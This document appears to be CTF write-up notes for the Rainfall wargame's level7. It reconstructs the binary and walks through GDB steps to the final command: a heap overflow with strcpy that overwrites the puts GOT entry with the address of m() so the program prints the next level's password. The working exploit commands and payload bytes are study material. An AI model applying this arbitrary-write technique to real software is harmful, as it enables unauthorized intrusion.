# Level7 - Exam Notes

## 1. Objective
Display the level8 password. The program reads the password into a global buffer **c** then calls puts("~~"). We must hijack a call to display **c** (e.g. replace the GOT entry for puts with the address of **m** which does printf with c).

## 2. Copy the binary (extraction)
From the host:
```bash
scp -P 4242 level7@localhost:level7 ./level7.bin
```

## 3. Binary-to-source translation (source reconstruction)
- **main:** two structures (ptr1, ptr2) with malloc(8) each, and ptr1[1], ptr2[1] point to 8-byte blocks. **strcpy(ptr1[1], argv[1])** and **strcpy(ptr2[1], argv[2])** with no limit. Then fopen(".pass"), fgets(c, ...), then **puts** (hardcoded address). **m()** does printf with buffer **c**.
- **Where it can break:** the first strcpy fills the ptr1[1] block (8 bytes). By overflowing we overwrite the next region in memory (next block = ptr2[0] and ptr2[1]). So we control **ptr2[1]** = destination of the second strcpy. If we put **GOT of puts** in ptr2[1] and **address of m** in argv[2], the second strcpy writes the address of m into the GOT → puts("~~") will call m() and display c.
- Source: see `source`.

## 4. Understanding where it can break (vulnerability hypothesis)
- **Suspicious functions:** two strcpy with no limit; the first overflow lets us control the **destination** of the second (arbitrary write).
- **Success:** display buffer c. m() does exactly that. By overwriting the puts GOT with the address of m, the puts call runs m().
- **Hypothesis:** argv[1] = padding + puts GOT address (so ptr2[1] = GOT); argv[2] = address of m (4 bytes). Offset to measure in GDB (often 20 on Rainfall: 8 + 8 + padding).

## 5. GDB diagnosis step-by-step

1. **Start GDB**
   ```bash
   gdb -q ./level7.bin
   ```

2. **Locate the strcpy calls and layout**
   ```gdb
   disas main
   ```
   Note the two strcpy calls and allocation order. After the second strcpy, set a breakpoint to inspect ptr2[1] and the GOT.

3. **GOT and m addresses**
   ```gdb
   readelf -r level7.bin
   ```
   ```bash
   (gdb) x/i 0x8048400
   0x8048400 <puts@plt>:        jmp    *0x8049928
   ```
   Find the reloc for puts → **GOT puts = 0x8049928**.
   ```gdb
   info functions m
   (gdb) p m
   $1 = {<text variable, no debug info>} 0x80484f4 <m>
   ```
   **m = 0x080484f4**.

4. **Breakpoint after both strcpy**
   ```gdb
   break *0x080485c2
   run $(python -c 'print "A"*20 + "\x28\x99\x04\x08"') $(python -c 'print "\xf4\x84\x04\x08"')
   ```
   Verify ptr2[1] points to 0x8049928. Then:
   ```gdb
   x/wx 0x8049928
   ```
   Must show **0x080484f4** (address of m). This proves the second strcpy wrote to the GOT.

## 6. Exploit design and command explanation

**Design:** Arbitrary write: by overflowing ptr1[1] we overwrite ptr2[1]. The second strcpy writes argv[2] to the address we put in ptr2[1]. We choose **GOT puts** as destination and **address of m** as value → puts("~~") calls m() which displays c.

```bash
[ buf1 user : 8 bytes ][ ptr2 chunk header : 8 bytes ][ ptr2->id : 4 bytes ][ ptr2->buf : 4 bytes ][ buf2 chunk header : 8 bytes ][ buf2 user : 8 bytes ]

[ 41 41 41 41 41 41 41 41 ][ 41 41 41 41 41 41 41 41 ][ 41 41 41 41 ][ 28 99 04 08 ]
```
```c
strcpy(0x08049928, "\xf4\x84\x04\x08");
```

**Final command:**
```bash
./level7 $(python -c 'print "A"*20 + "\x28\x99\x04\x08"') $(python -c 'print "\xf4\x84\x04\x08"')
```

**Breakdown:**

- **Invocation:** two arguments; no need to keep stdin open.

- **argv[1] — Part 1: 20 bytes 'A' (padding)**
  - Fill the ptr1[1] block (8 bytes) and overflow to overwrite ptr2[0] and **ptr2[1]** (destination of 2nd strcpy). The last 4 bytes of argv[1] become the new value of ptr2[1]. 20 = offset found in GDB on Rainfall.

- **argv[1] — Part 2: 4 bytes = puts GOT address**
  - Address: **0x8049928**. Little-endian: 28, 99, 04, 08 → `\x28\x99\x04\x08`. Role: ptr2[1] = 0x8049928 → the second strcpy writes **at this address** (the puts GOT).

- **argv[2]: 4 bytes = address of m**
  - Address: **0x080484f4**. Little-endian: f4, 84, 04, 08 → `\xf4\x84\x04\x08`. Role: this is what strcpy writes into the GOT. So the puts GOT entry becomes 0x080484f4; on the next puts call the program runs m() and displays c (password).

Summary: **20×'A'** + **\x28\x99\x04\x08** = ptr2[1] points to the GOT; **\xf4\x84\x04\x08** = value written (m) → puts runs m() → password displayed.
